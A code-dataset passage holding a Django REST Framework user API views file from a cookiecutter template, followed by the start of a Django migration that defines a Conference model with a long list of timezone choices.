97de7ff4ed3dc94c32bf756a57aee0664a888cbc
[ "BSD-3-Clause" ]
2
2022-03-24T20:39:00.000Z
2022-03-24T20:39:48.000Z
{{cookiecutter.project_slug}}/usuario/api_views.py
claysllanxavier/django-cookiecutter
97de7ff4ed3dc94c32bf756a57aee0664a888cbc
[ "BSD-3-Clause" ]
2
2021-09-21T00:05:27.000Z
2022-01-03T10:50:05.000Z
from drf_jsonmask.views import OptimizedQuerySetMixin from rest_framework import filters from rest_framework.viewsets import ModelViewSet, ReadOnlyModelViewSet from rest_framework.decorators import permission_classes from rest_framework.permissions import IsAuthenticated from .serializers import UsuarioSerializer, UsuarioGETSerializer from .models import Usuario @permission_classes([IsAuthenticated, ]) class UsuarioViewAPI(ModelViewSet): """ Classe para gerenciar as requisições da API para os métodos POST, PUT, PATCH e DELETE """ queryset = Usuario.objects.select_related().all() serializer_class = UsuarioSerializer @permission_classes([IsAuthenticated, ]) class UsuarioGETAPI(OptimizedQuerySetMixin, ReadOnlyModelViewSet): """ Classe para gerenciar as requisições da API para o métodos GET A lista filterset_fields deve ser configurada com os campos do models que poderão ser utilizados para realizar filtros no models como por exemplo nome_do_campo=valor_a_ser_filtrado A lista search_fields deve ser configurada com os campos do models que poderão ser utilizados para realizar buscas no models como por exemplo search=valor_a_ser_pesquisado """ queryset = Usuario.objects.select_related().all() serializer_class = UsuarioGETSerializer filter_backend = [filters.SearchFilter] # TODO Configure os parâmetros de filtro (filterset_fields) e buscar (search_fields) filterset_fields = [] search_fields = []
42.714286
118
0.793311
05565ae2653798cde82cc12ea6174e172c4c360c
25,053
py
Python
symposion/conference/migrations/0001_initial.py
azkarmoulana/pycon
931388e6f640c35b892bb4b2d12581ba7ec8cf4e
[ "BSD-3-Clause" ]
154
2015-01-17T02:29:24.000Z
2022-03-20T20:37:24.000Z
symposion/conference/migrations/0001_initial.py
azkarmoulana/pycon
931388e6f640c35b892bb4b2d12581ba7ec8cf4e
[ "BSD-3-Clause" ]
316
2015-01-10T04:01:50.000Z
2020-09-30T20:18:08.000Z
symposion/conference/migrations/0001_initial.py
azkarmoulana/pycon
931388e6f640c35b892bb4b2d12581ba7ec8cf4e
[ "BSD-3-Clause" ]
89
2015-01-10T05:25:21.000Z
2022-02-27T03:28:59.000Z
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations import timezones.fields class Migration(migrations.Migration): dependencies = [ ] operations = [ migrations.CreateModel( name='Conference', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('title', models.CharField(max_length=100, verbose_name='title')), ('start_date', models.DateField(null=True, verbose_name='start date', blank=True)), ('end_date', models.DateField(null=True, verbose_name='end date', blank=True)), ('timezone', timezones.fields.TimeZoneField(default=b'US/Eastern', max_length=100, verbose_name='timezone', blank=True, choices=[(b'Pacific/Midway', b'(GMT-1100) Pacific/Midway'), (b'Pacific/Niue', b'(GMT-1100) Pacific/Niue'), (b'Pacific/Pago_Pago', b'(GMT-1100) Pacific/Pago_Pago'), (b'Pacific/Honolulu', b'(GMT-1000) Pacific/Honolulu'), (b'Pacific/Johnston', b'(GMT-1000) Pacific/Johnston'), (b'Pacific/Rarotonga', b'(GMT-1000) Pacific/Rarotonga'), (b'Pacific/Tahiti', b'(GMT-1000) Pacific/Tahiti'), (b'US/Hawaii', b'(GMT-1000) US/Hawaii'), (b'Pacific/Marquesas', b'(GMT-0930) Pacific/Marquesas'), (b'America/Adak', b'(GMT-0900) America/Adak'), (b'Pacific/Gambier', b'(GMT-0900) Pacific/Gambier'), (b'America/Anchorage', b'(GMT-0800) America/Anchorage'), (b'America/Juneau', b'(GMT-0800) America/Juneau'), (b'America/Metlakatla', b'(GMT-0800) America/Metlakatla'), (b'America/Nome', b'(GMT-0800) America/Nome'), (b'America/Sitka', b'(GMT-0800) America/Sitka'), (b'America/Yakutat', b'(GMT-0800) America/Yakutat'), (b'Pacific/Pitcairn', b'(GMT-0800) Pacific/Pitcairn'), (b'US/Alaska', b'(GMT-0800) US/Alaska'), (b'America/Creston', b'(GMT-0700) America/Creston'), (b'America/Dawson', b'(GMT-0700) America/Dawson'), (b'America/Dawson_Creek', b'(GMT-0700) America/Dawson_Creek'), (b'America/Hermosillo', b'(GMT-0700) America/Hermosillo'), (b'America/Los_Angeles', b'(GMT-0700) America/Los_Angeles'), (b'America/Phoenix', b'(GMT-0700) America/Phoenix'), (b'America/Santa_Isabel', b'(GMT-0700) America/Santa_Isabel'), (b'America/Tijuana', b'(GMT-0700) America/Tijuana'), (b'America/Vancouver', b'(GMT-0700) America/Vancouver'), (b'America/Whitehorse', b'(GMT-0700) America/Whitehorse'), (b'Canada/Pacific', b'(GMT-0700) Canada/Pacific'), (b'US/Arizona', b'(GMT-0700) US/Arizona'), (b'US/Pacific', b'(GMT-0700) US/Pacific'), (b'America/Belize', b'(GMT-0600) America/Belize'), (b'America/Boise', b'(GMT-0600) America/Boise'), (b'America/Cambridge_Bay', b'(GMT-0600) America/Cambridge_Bay'), (b'America/Chihuahua', b'(GMT-0600) America/Chihuahua'), (b'America/Costa_Rica', b'(GMT-0600) America/Costa_Rica'), (b'America/Denver', b'(GMT-0600) America/Denver'), (b'America/Edmonton', b'(GMT-0600) America/Edmonton'), (b'America/El_Salvador', b'(GMT-0600) America/El_Salvador'), (b'America/Guatemala', b'(GMT-0600) America/Guatemala'), (b'America/Inuvik', b'(GMT-0600) America/Inuvik'), (b'America/Managua', b'(GMT-0600) America/Managua'), (b'America/Mazatlan', b'(GMT-0600) America/Mazatlan'), (b'America/Ojinaga', b'(GMT-0600) America/Ojinaga'), (b'America/Regina', b'(GMT-0600) America/Regina'), (b'America/Swift_Current', b'(GMT-0600) America/Swift_Current'), (b'America/Tegucigalpa', b'(GMT-0600) America/Tegucigalpa'), (b'America/Yellowknife', b'(GMT-0600) America/Yellowknife'), (b'Canada/Mountain', b'(GMT-0600) Canada/Mountain'), (b'Pacific/Galapagos', b'(GMT-0600) Pacific/Galapagos'), (b'US/Mountain', b'(GMT-0600) US/Mountain'), (b'America/Atikokan', b'(GMT-0500) America/Atikokan'), (b'America/Bahia_Banderas', b'(GMT-0500) America/Bahia_Banderas'), (b'America/Bogota', b'(GMT-0500) America/Bogota'), (b'America/Cancun', b'(GMT-0500) America/Cancun'), (b'America/Cayman', b'(GMT-0500) America/Cayman'), (b'America/Chicago', b'(GMT-0500) America/Chicago'), (b'America/Eirunepe', b'(GMT-0500) America/Eirunepe'), (b'America/Guayaquil', b'(GMT-0500) America/Guayaquil'), (b'America/Indiana/Knox', b'(GMT-0500) America/Indiana/Knox'), (b'America/Indiana/Tell_City', b'(GMT-0500) America/Indiana/Tell_City'), (b'America/Jamaica', b'(GMT-0500) America/Jamaica'), (b'America/Lima', b'(GMT-0500) America/Lima'), (b'America/Matamoros', b'(GMT-0500) America/Matamoros'), (b'America/Menominee', b'(GMT-0500) America/Menominee'), (b'America/Merida', b'(GMT-0500) America/Merida'), (b'America/Mexico_City', b'(GMT-0500) America/Mexico_City'), (b'America/Monterrey', b'(GMT-0500) America/Monterrey'), (b'America/North_Dakota/Beulah', b'(GMT-0500) America/North_Dakota/Beulah'), (b'America/North_Dakota/Center', b'(GMT-0500) America/North_Dakota/Center'), (b'America/North_Dakota/New_Salem', b'(GMT-0500) America/North_Dakota/New_Salem'), (b'America/Panama', b'(GMT-0500) America/Panama'), (b'America/Rainy_River', b'(GMT-0500) America/Rainy_River'), (b'America/Rankin_Inlet', b'(GMT-0500) America/Rankin_Inlet'), (b'America/Resolute', b'(GMT-0500) America/Resolute'), (b'America/Rio_Branco', b'(GMT-0500) America/Rio_Branco'), (b'America/Winnipeg', b'(GMT-0500) America/Winnipeg'), (b'Canada/Central', b'(GMT-0500) Canada/Central'), (b'Pacific/Easter', b'(GMT-0500) Pacific/Easter'), (b'US/Central', b'(GMT-0500) US/Central'), (b'America/Caracas', b'(GMT-0430) America/Caracas'), (b'America/Anguilla', b'(GMT-0400) America/Anguilla'), (b'America/Antigua', b'(GMT-0400) America/Antigua'), (b'America/Aruba', b'(GMT-0400) America/Aruba'), (b'America/Asuncion', b'(GMT-0400) America/Asuncion'), (b'America/Barbados', b'(GMT-0400) America/Barbados'), (b'America/Blanc-Sablon', b'(GMT-0400) America/Blanc-Sablon'), (b'America/Boa_Vista', b'(GMT-0400) America/Boa_Vista'), (b'America/Campo_Grande', b'(GMT-0400) America/Campo_Grande'), (b'America/Cuiaba', b'(GMT-0400) America/Cuiaba'), (b'America/Curacao', b'(GMT-0400) America/Curacao'), (b'America/Detroit', b'(GMT-0400) America/Detroit'), (b'America/Dominica', b'(GMT-0400) America/Dominica'), (b'America/Grand_Turk', b'(GMT-0400) America/Grand_Turk'), (b'America/Grenada', b'(GMT-0400) America/Grenada'), (b'America/Guadeloupe', b'(GMT-0400) America/Guadeloupe'), (b'America/Guyana', b'(GMT-0400) America/Guyana'), (b'America/Havana', b'(GMT-0400) America/Havana'), (b'America/Indiana/Indianapolis', b'(GMT-0400) America/Indiana/Indianapolis'), (b'America/Indiana/Marengo', b'(GMT-0400) America/Indiana/Marengo'), (b'America/Indiana/Petersburg', b'(GMT-0400) America/Indiana/Petersburg'), (b'America/Indiana/Vevay', b'(GMT-0400) America/Indiana/Vevay'), (b'America/Indiana/Vincennes', b'(GMT-0400) America/Indiana/Vincennes'), (b'America/Indiana/Winamac', b'(GMT-0400) America/Indiana/Winamac'), (b'America/Iqaluit', b'(GMT-0400) America/Iqaluit'), (b'America/Kentucky/Louisville', b'(GMT-0400) America/Kentucky/Louisville'), (b'America/Kentucky/Monticello', b'(GMT-0400) America/Kentucky/Monticello'), (b'America/Kralendijk', b'(GMT-0400) America/Kralendijk'), (b'America/La_Paz', b'(GMT-0400) America/La_Paz'), (b'America/Lower_Princes', b'(GMT-0400) America/Lower_Princes'), (b'America/Manaus', b'(GMT-0400) America/Manaus'), (b'America/Marigot', b'(GMT-0400) America/Marigot'), (b'America/Martinique', b'(GMT-0400) America/Martinique'), (b'America/Montserrat', b'(GMT-0400) America/Montserrat'), (b'America/Nassau', b'(GMT-0400) America/Nassau'), (b'America/New_York', b'(GMT-0400) America/New_York'), (b'America/Nipigon', b'(GMT-0400) America/Nipigon'), (b'America/Pangnirtung', b'(GMT-0400) America/Pangnirtung'), (b'America/Port-au-Prince', b'(GMT-0400) America/Port-au-Prince'), (b'America/Port_of_Spain', b'(GMT-0400) America/Port_of_Spain'), (b'America/Porto_Velho', b'(GMT-0400) America/Porto_Velho'), (b'America/Puerto_Rico', b'(GMT-0400) America/Puerto_Rico'), (b'America/Santo_Domingo', b'(GMT-0400) America/Santo_Domingo'), (b'America/St_Barthelemy', b'(GMT-0400) America/St_Barthelemy'), (b'America/St_Kitts', b'(GMT-0400) America/St_Kitts'), (b'America/St_Lucia', b'(GMT-0400) America/St_Lucia'), (b'America/St_Thomas', b'(GMT-0400) America/St_Thomas'), (b'America/St_Vincent', b'(GMT-0400) America/St_Vincent'), (b'America/Thunder_Bay', b'(GMT-0400) America/Thunder_Bay'), (b'America/Toronto', b'(GMT-0400) America/Toronto'), (b'America/Tortola', b'(GMT-0400) America/Tortola'), (b'Canada/Eastern', b'(GMT-0400) Canada/Eastern'), (b'US/Eastern', b'(GMT-0400) US/Eastern'), (b'America/Araguaina', b'(GMT-0300) America/Araguaina'), (b'America/Argentina/Buenos_Aires', b'(GMT-0300) America/Argentina/Buenos_Aires'), (b'America/Argentina/Catamarca', b'(GMT-0300) America/Argentina/Catamarca'), (b'America/Argentina/Cordoba', b'(GMT-0300) America/Argentina/Cordoba'), (b'America/Argentina/Jujuy', b'(GMT-0300) America/Argentina/Jujuy'), (b'America/Argentina/La_Rioja', b'(GMT-0300) America/Argentina/La_Rioja'), (b'America/Argentina/Mendoza', b'(GMT-0300) America/Argentina/Mendoza'), (b'America/Argentina/Rio_Gallegos', b'(GMT-0300) America/Argentina/Rio_Gallegos'), (b'America/Argentina/Salta', b'(GMT-0300) America/Argentina/Salta'), (b'America/Argentina/San_Juan', b'(GMT-0300) America/Argentina/San_Juan'), (b'America/Argentina/San_Luis', b'(GMT-0300) America/Argentina/San_Luis'), (b'America/Argentina/Tucuman', b'(GMT-0300) America/Argentina/Tucuman'), (b'America/Argentina/Ushuaia', b'(GMT-0300) America/Argentina/Ushuaia'), (b'America/Bahia', b'(GMT-0300) America/Bahia'), (b'America/Belem', b'(GMT-0300) America/Belem'), (b'America/Cayenne', b'(GMT-0300) America/Cayenne'), (b'America/Fortaleza', b'(GMT-0300) America/Fortaleza'), (b'America/Glace_Bay', b'(GMT-0300) America/Glace_Bay'), (b'America/Goose_Bay', b'(GMT-0300) America/Goose_Bay'), (b'America/Halifax', b'(GMT-0300) America/Halifax'), (b'America/Maceio', b'(GMT-0300) America/Maceio'), (b'America/Moncton', b'(GMT-0300) America/Moncton'), (b'America/Montevideo', b'(GMT-0300) America/Montevideo'), (b'America/Paramaribo', b'(GMT-0300) America/Paramaribo'), (b'America/Recife', b'(GMT-0300) America/Recife'), (b'America/Santarem', b'(GMT-0300) America/Santarem'), (b'America/Santiago', b'(GMT-0300) America/Santiago'), (b'America/Sao_Paulo', b'(GMT-0300) America/Sao_Paulo'), (b'America/Thule', b'(GMT-0300) America/Thule'), (b'Antarctica/Palmer', b'(GMT-0300) Antarctica/Palmer'), (b'Antarctica/Rothera', b'(GMT-0300) Antarctica/Rothera'), (b'Atlantic/Bermuda', b'(GMT-0300) Atlantic/Bermuda'), (b'Atlantic/Stanley', b'(GMT-0300) Atlantic/Stanley'), (b'Canada/Atlantic', b'(GMT-0300) Canada/Atlantic'), (b'America/St_Johns', b'(GMT-0230) America/St_Johns'), (b'Canada/Newfoundland', b'(GMT-0230) Canada/Newfoundland'), (b'America/Godthab', b'(GMT-0200) America/Godthab'), (b'America/Miquelon', b'(GMT-0200) America/Miquelon'), (b'America/Noronha', b'(GMT-0200) America/Noronha'), (b'Atlantic/South_Georgia', b'(GMT-0200) Atlantic/South_Georgia'), (b'Atlantic/Cape_Verde', b'(GMT-0100) Atlantic/Cape_Verde'), (b'Africa/Abidjan', b'(GMT+0000) Africa/Abidjan'), (b'Africa/Accra', b'(GMT+0000) Africa/Accra'), (b'Africa/Bamako', b'(GMT+0000) Africa/Bamako'), (b'Africa/Banjul', b'(GMT+0000) Africa/Banjul'), (b'Africa/Bissau', b'(GMT+0000) Africa/Bissau'), (b'Africa/Casablanca', b'(GMT+0000) Africa/Casablanca'), (b'Africa/Conakry', b'(GMT+0000) Africa/Conakry'), (b'Africa/Dakar', b'(GMT+0000) Africa/Dakar'), (b'Africa/El_Aaiun', b'(GMT+0000) Africa/El_Aaiun'), (b'Africa/Freetown', b'(GMT+0000) Africa/Freetown'), (b'Africa/Lome', b'(GMT+0000) Africa/Lome'), (b'Africa/Monrovia', b'(GMT+0000) Africa/Monrovia'), (b'Africa/Nouakchott', b'(GMT+0000) Africa/Nouakchott'), (b'Africa/Ouagadougou', b'(GMT+0000) Africa/Ouagadougou'), (b'Africa/Sao_Tome', b'(GMT+0000) Africa/Sao_Tome'), (b'America/Danmarkshavn', b'(GMT+0000) America/Danmarkshavn'), (b'America/Scoresbysund', b'(GMT+0000) America/Scoresbysund'), (b'Atlantic/Azores', b'(GMT+0000) Atlantic/Azores'), (b'Atlantic/Reykjavik', b'(GMT+0000) Atlantic/Reykjavik'), (b'Atlantic/St_Helena', b'(GMT+0000) Atlantic/St_Helena'), (b'GMT', b'(GMT+0000) GMT'), (b'UTC', b'(GMT+0000) UTC'), (b'Africa/Algiers', b'(GMT+0100) Africa/Algiers'), (b'Africa/Bangui', b'(GMT+0100) Africa/Bangui'), (b'Africa/Brazzaville', b'(GMT+0100) Africa/Brazzaville'), (b'Africa/Douala', b'(GMT+0100) Africa/Douala'), (b'Africa/Kinshasa', b'(GMT+0100) Africa/Kinshasa'), (b'Africa/Lagos', b'(GMT+0100) Africa/Lagos'), (b'Africa/Libreville', b'(GMT+0100) Africa/Libreville'), (b'Africa/Luanda', b'(GMT+0100) Africa/Luanda'), (b'Africa/Malabo', b'(GMT+0100) Africa/Malabo'), (b'Africa/Ndjamena', b'(GMT+0100) Africa/Ndjamena'), (b'Africa/Niamey', b'(GMT+0100) Africa/Niamey'), (b'Africa/Porto-Novo', b'(GMT+0100) Africa/Porto-Novo'), (b'Africa/Tunis', b'(GMT+0100) Africa/Tunis'), (b'Africa/Windhoek', b'(GMT+0100) Africa/Windhoek'), (b'Atlantic/Canary', b'(GMT+0100) Atlantic/Canary'), (b'Atlantic/Faroe', b'(GMT+0100) Atlantic/Faroe'), (b'Atlantic/Madeira', b'(GMT+0100) Atlantic/Madeira'), (b'Europe/Dublin', b'(GMT+0100) Europe/Dublin'), (b'Europe/Guernsey', b'(GMT+0100) Europe/Guernsey'), (b'Europe/Isle_of_Man', b'(GMT+0100) Europe/Isle_of_Man'), (b'Europe/Jersey', b'(GMT+0100) Europe/Jersey'), (b'Europe/Lisbon', b'(GMT+0100) Europe/Lisbon'), (b'Europe/London', b'(GMT+0100) Europe/London'), (b'Africa/Blantyre', b'(GMT+0200) Africa/Blantyre'), (b'Africa/Bujumbura', b'(GMT+0200) Africa/Bujumbura'), (b'Africa/Cairo', b'(GMT+0200) Africa/Cairo'), (b'Africa/Ceuta', b'(GMT+0200) Africa/Ceuta'), (b'Africa/Gaborone', b'(GMT+0200) Africa/Gaborone'), (b'Africa/Harare', b'(GMT+0200) Africa/Harare'), (b'Africa/Johannesburg', b'(GMT+0200) Africa/Johannesburg'), (b'Africa/Kigali', b'(GMT+0200) Africa/Kigali'), (b'Africa/Lubumbashi', b'(GMT+0200) Africa/Lubumbashi'), (b'Africa/Lusaka', b'(GMT+0200) Africa/Lusaka'), (b'Africa/Maputo', b'(GMT+0200) Africa/Maputo'), (b'Africa/Maseru', b'(GMT+0200) Africa/Maseru'), (b'Africa/Mbabane', b'(GMT+0200) Africa/Mbabane'), (b'Africa/Tripoli', b'(GMT+0200) Africa/Tripoli'), (b'Antarctica/Troll', b'(GMT+0200) Antarctica/Troll'), (b'Arctic/Longyearbyen', b'(GMT+0200) Arctic/Longyearbyen'), (b'Europe/Amsterdam', b'(GMT+0200) Europe/Amsterdam'), (b'Europe/Andorra', b'(GMT+0200) Europe/Andorra'), (b'Europe/Belgrade', b'(GMT+0200) Europe/Belgrade'), (b'Europe/Berlin', b'(GMT+0200) Europe/Berlin'), (b'Europe/Bratislava', b'(GMT+0200) Europe/Bratislava'), (b'Europe/Brussels', b'(GMT+0200) Europe/Brussels'), (b'Europe/Budapest', b'(GMT+0200) Europe/Budapest'), (b'Europe/Busingen', b'(GMT+0200) Europe/Busingen'), (b'Europe/Copenhagen', b'(GMT+0200) Europe/Copenhagen'), (b'Europe/Gibraltar', b'(GMT+0200) Europe/Gibraltar'), (b'Europe/Kaliningrad', b'(GMT+0200) Europe/Kaliningrad'), (b'Europe/Ljubljana', b'(GMT+0200) Europe/Ljubljana'), (b'Europe/Luxembourg', b'(GMT+0200) Europe/Luxembourg'), (b'Europe/Madrid', b'(GMT+0200) Europe/Madrid'), (b'Europe/Malta', b'(GMT+0200) Europe/Malta'), (b'Europe/Monaco', b'(GMT+0200) Europe/Monaco'), (b'Europe/Oslo', b'(GMT+0200) Europe/Oslo'), (b'Europe/Paris', b'(GMT+0200) Europe/Paris'), (b'Europe/Podgorica', b'(GMT+0200) Europe/Podgorica'), (b'Europe/Prague', b'(GMT+0200) Europe/Prague'), (b'Europe/Rome', b'(GMT+0200) Europe/Rome'), (b'Europe/San_Marino', b'(GMT+0200) Europe/San_Marino'), (b'Europe/Sarajevo', b'(GMT+0200) Europe/Sarajevo'), (b'Europe/Skopje', b'(GMT+0200) Europe/Skopje'), (b'Europe/Stockholm', b'(GMT+0200) Europe/Stockholm'), (b'Europe/Tirane', b'(GMT+0200) Europe/Tirane'), (b'Europe/Vaduz', b'(GMT+0200) Europe/Vaduz'), (b'Europe/Vatican', b'(GMT+0200) Europe/Vatican'), (b'Europe/Vienna', b'(GMT+0200) Europe/Vienna'), (b'Europe/Warsaw', b'(GMT+0200) Europe/Warsaw'), (b'Europe/Zagreb', b'(GMT+0200) Europe/Zagreb'), (b'Europe/Zurich', b'(GMT+0200) Europe/Zurich'), (b'Africa/Addis_Ababa', b'(GMT+0300) Africa/Addis_Ababa'), (b'Africa/Asmara', b'(GMT+0300) Africa/Asmara'), (b'Africa/Dar_es_Salaam', b'(GMT+0300) Africa/Dar_es_Salaam'), (b'Africa/Djibouti', b'(GMT+0300) Africa/Djibouti'), (b'Africa/Juba', b'(GMT+0300) Africa/Juba'), (b'Africa/Kampala', b'(GMT+0300) Africa/Kampala'), (b'Africa/Khartoum', b'(GMT+0300) Africa/Khartoum'), (b'Africa/Mogadishu', b'(GMT+0300) Africa/Mogadishu'), (b'Africa/Nairobi', b'(GMT+0300) Africa/Nairobi'), (b'Antarctica/Syowa', b'(GMT+0300) Antarctica/Syowa'), (b'Asia/Aden', b'(GMT+0300) Asia/Aden'), (b'Asia/Amman', b'(GMT+0300) Asia/Amman'), (b'Asia/Baghdad', b'(GMT+0300) Asia/Baghdad'), (b'Asia/Bahrain', b'(GMT+0300) Asia/Bahrain'), (b'Asia/Beirut', b'(GMT+0300) Asia/Beirut'), (b'Asia/Damascus', b'(GMT+0300) Asia/Damascus'), (b'Asia/Gaza', b'(GMT+0300) Asia/Gaza'), (b'Asia/Hebron', b'(GMT+0300) Asia/Hebron'), (b'Asia/Jerusalem', b'(GMT+0300) Asia/Jerusalem'), (b'Asia/Kuwait', b'(GMT+0300) Asia/Kuwait'), (b'Asia/Nicosia', b'(GMT+0300) Asia/Nicosia'), (b'Asia/Qatar', b'(GMT+0300) Asia/Qatar'), (b'Asia/Riyadh', b'(GMT+0300) Asia/Riyadh'), (b'Europe/Athens', b'(GMT+0300) Europe/Athens'), (b'Europe/Bucharest', b'(GMT+0300) Europe/Bucharest'), (b'Europe/Chisinau', b'(GMT+0300) Europe/Chisinau'), (b'Europe/Helsinki', b'(GMT+0300) Europe/Helsinki'), (b'Europe/Istanbul', b'(GMT+0300) Europe/Istanbul'), (b'Europe/Kiev', b'(GMT+0300) Europe/Kiev'), (b'Europe/Mariehamn', b'(GMT+0300) Europe/Mariehamn'), (b'Europe/Minsk', b'(GMT+0300) Europe/Minsk'), (b'Europe/Moscow', b'(GMT+0300) Europe/Moscow'), (b'Europe/Riga', b'(GMT+0300) Europe/Riga'), (b'Europe/Simferopol', b'(GMT+0300) Europe/Simferopol'), (b'Europe/Sofia', b'(GMT+0300) Europe/Sofia'), (b'Europe/Tallinn', b'(GMT+0300) Europe/Tallinn'), (b'Europe/Uzhgorod', b'(GMT+0300) Europe/Uzhgorod'), (b'Europe/Vilnius', b'(GMT+0300) Europe/Vilnius'), (b'Europe/Volgograd', b'(GMT+0300) Europe/Volgograd'), (b'Europe/Zaporozhye', b'(GMT+0300) Europe/Zaporozhye'), (b'Indian/Antananarivo', b'(GMT+0300) Indian/Antananarivo'), (b'Indian/Comoro', b'(GMT+0300) Indian/Comoro'), (b'Indian/Mayotte', b'(GMT+0300) Indian/Mayotte'), (b'Asia/Dubai', b'(GMT+0400) Asia/Dubai'), (b'Asia/Muscat', b'(GMT+0400) Asia/Muscat'), (b'Asia/Tbilisi', b'(GMT+0400) Asia/Tbilisi'), (b'Asia/Yerevan', b'(GMT+0400) Asia/Yerevan'), (b'Europe/Samara', b'(GMT+0400) Europe/Samara'), (b'Indian/Mahe', b'(GMT+0400) Indian/Mahe'), (b'Indian/Mauritius', b'(GMT+0400) Indian/Mauritius'), (b'Indian/Reunion', b'(GMT+0400) Indian/Reunion'), (b'Asia/Kabul', b'(GMT+0430) Asia/Kabul'), (b'Asia/Tehran', b'(GMT+0430) Asia/Tehran'), (b'Antarctica/Mawson', b'(GMT+0500) Antarctica/Mawson'), (b'Asia/Aqtau', b'(GMT+0500) Asia/Aqtau'), (b'Asia/Aqtobe', b'(GMT+0500) Asia/Aqtobe'), (b'Asia/Ashgabat', b'(GMT+0500) Asia/Ashgabat'), (b'Asia/Baku', b'(GMT+0500) Asia/Baku'), (b'Asia/Dushanbe', b'(GMT+0500) Asia/Dushanbe'), (b'Asia/Karachi', b'(GMT+0500) Asia/Karachi'), (b'Asia/Oral', b'(GMT+0500) Asia/Oral'), (b'Asia/Samarkand', b'(GMT+0500) Asia/Samarkand'), (b'Asia/Tashkent', b'(GMT+0500) Asia/Tashkent'), (b'Asia/Yekaterinburg', b'(GMT+0500) Asia/Yekaterinburg'), (b'Indian/Kerguelen', b'(GMT+0500) Indian/Kerguelen'), (b'Indian/Maldives', b'(GMT+0500) Indian/Maldives'), (b'Asia/Colombo', b'(GMT+0530) Asia/Colombo'), (b'Asia/Kolkata', b'(GMT+0530) Asia/Kolkata'), (b'Asia/Kathmandu', b'(GMT+0545) Asia/Kathmandu'), (b'Antarctica/Vostok', b'(GMT+0600) Antarctica/Vostok'), (b'Asia/Almaty', b'(GMT+0600) Asia/Almaty'), (b'Asia/Bishkek', b'(GMT+0600) Asia/Bishkek'), (b'Asia/Dhaka', b'(GMT+0600) Asia/Dhaka'), (b'Asia/Novosibirsk', b'(GMT+0600) Asia/Novosibirsk'), (b'Asia/Omsk', b'(GMT+0600) Asia/Omsk'), (b'Asia/Qyzylorda', b'(GMT+0600) Asia/Qyzylorda'), (b'Asia/Thimphu', b'(GMT+0600) Asia/Thimphu'), (b'Asia/Urumqi', b'(GMT+0600) Asia/Urumqi'), (b'Indian/Chagos', b'(GMT+0600) Indian/Chagos'), (b'Asia/Rangoon', b'(GMT+0630) Asia/Rangoon'), (b'Indian/Cocos', b'(GMT+0630) Indian/Cocos'), (b'Antarctica/Davis', b'(GMT+0700) Antarctica/Davis'), (b'Asia/Bangkok', b'(GMT+0700) Asia/Bangkok'), (b'Asia/Ho_Chi_Minh', b'(GMT+0700) Asia/Ho_Chi_Minh'), (b'Asia/Jakarta', b'(GMT+0700) Asia/Jakarta'), (b'Asia/Krasnoyarsk', b'(GMT+0700) Asia/Krasnoyarsk'), (b'Asia/Novokuznetsk', b'(GMT+0700) Asia/Novokuznetsk'), (b'Asia/Phnom_Penh', b'(GMT+0700) Asia/Phnom_Penh'), (b'Asia/Pontianak', b'(GMT+0700) Asia/Pontianak'), (b'Asia/Vientiane', b'(GMT+0700) Asia/Vientiane'), (b'Indian/Christmas', b'(GMT+0700) Indian/Christmas'), (b'Antarctica/Casey', b'(GMT+0800) Antarctica/Casey'), (b'Asia/Brunei', b'(GMT+0800) Asia/Brunei'), (b'Asia/Chita', b'(GMT+0800) Asia/Chita'), (b'Asia/Hong_Kong', b'(GMT+0800) Asia/Hong_Kong'), (b'Asia/Hovd', b'(GMT+0800) Asia/Hovd'), (b'Asia/Irkutsk', b'(GMT+0800) Asia/Irkutsk'), (b'Asia/Kuala_Lumpur', b'(GMT+0800) Asia/Kuala_Lumpur'), (b'Asia/Kuching', b'(GMT+0800) Asia/Kuching'), (b'Asia/Macau', b'(GMT+0800) Asia/Macau'), (b'Asia/Makassar', b'(GMT+0800) Asia/Makassar'), (b'Asia/Manila', b'(GMT+0800) Asia/Manila'), (b'Asia/Shanghai', b'(GMT+0800) Asia/Shanghai'), (b'Asia/Singapore', b'(GMT+0800) Asia/Singapore'), (b'Asia/Taipei', b'(GMT+0800) Asia/Taipei'), (b'Australia/Perth', b'(GMT+0800) Australia/Perth'), (b'Australia/Eucla', b'(GMT+0845) Australia/Eucla'), (b'Asia/Choibalsan', b'(GMT+0900) Asia/Choibalsan'), (b'Asia/Dili', b'(GMT+0900) Asia/Dili'), (b'Asia/Jayapura', b'(GMT+0900) Asia/Jayapura'), (b'Asia/Khandyga', b'(GMT+0900) Asia/Khandyga'), (b'Asia/Pyongyang', b'(GMT+0900) Asia/Pyongyang'), (b'Asia/Seoul', b'(GMT+0900) Asia/Seoul'), (b'Asia/Tokyo', b'(GMT+0900) Asia/Tokyo'), (b'Asia/Ulaanbaatar', b'(GMT+0900) Asia/Ulaanbaatar'), (b'Asia/Yakutsk', b'(GMT+0900) Asia/Yakutsk'), (b'Pacific/Palau', b'(GMT+0900) Pacific/Palau'), (b'Australia/Adelaide', b'(GMT+0930) Australia/Adelaide'), (b'Australia/Broken_Hill', b'(GMT+0930) Australia/Broken_Hill'), (b'Australia/Darwin', b'(GMT+0930) Australia/Darwin'), (b'Antarctica/DumontDUrville', b'(GMT+1000) Antarctica/DumontDUrville'), (b'Asia/Magadan', b'(GMT+1000) Asia/Magadan'), (b'Asia/Sakhalin', b'(GMT+1000) Asia/Sakhalin'), (b'Asia/Ust-Nera', b'(GMT+1000) Asia/Ust-Nera'), (b'Asia/Vladivostok', b'(GMT+1000) Asia/Vladivostok'), (b'Australia/Brisbane', b'(GMT+1000) Australia/Brisbane'), (b'Australia/Currie', b'(GMT+1000) Australia/Currie'), (b'Australia/Hobart', b'(GMT+1000) Australia/Hobart'), (b'Australia/Lindeman', b'(GMT+1000) Australia/Lindeman'), (b'Australia/Melbourne', b'(GMT+1000) Australia/Melbourne'), (b'Australia/Sydney', b'(GMT+1000) Australia/Sydney'), (b'Pacific/Chuuk', b'(GMT+1000) Pacific/Chuuk'), (b'Pacific/Guam', b'(GMT+1000) Pacific/Guam'), (b'Pacific/Port_Moresby', b'(GMT+1000) Pacific/Port_Moresby'), (b'Pacific/Saipan', b'(GMT+1000) Pacific/Saipan'), (b'Australia/Lord_Howe', b'(GMT+1030) Australia/Lord_Howe'), (b'Antarctica/Macquarie', b'(GMT+1100) Antarctica/Macquarie'), (b'Asia/Srednekolymsk', b'(GMT+1100) Asia/Srednekolymsk'), (b'Pacific/Bougainville', b'(GMT+1100) Pacific/Bougainville'), (b'Pacific/Efate', b'(GMT+1100) 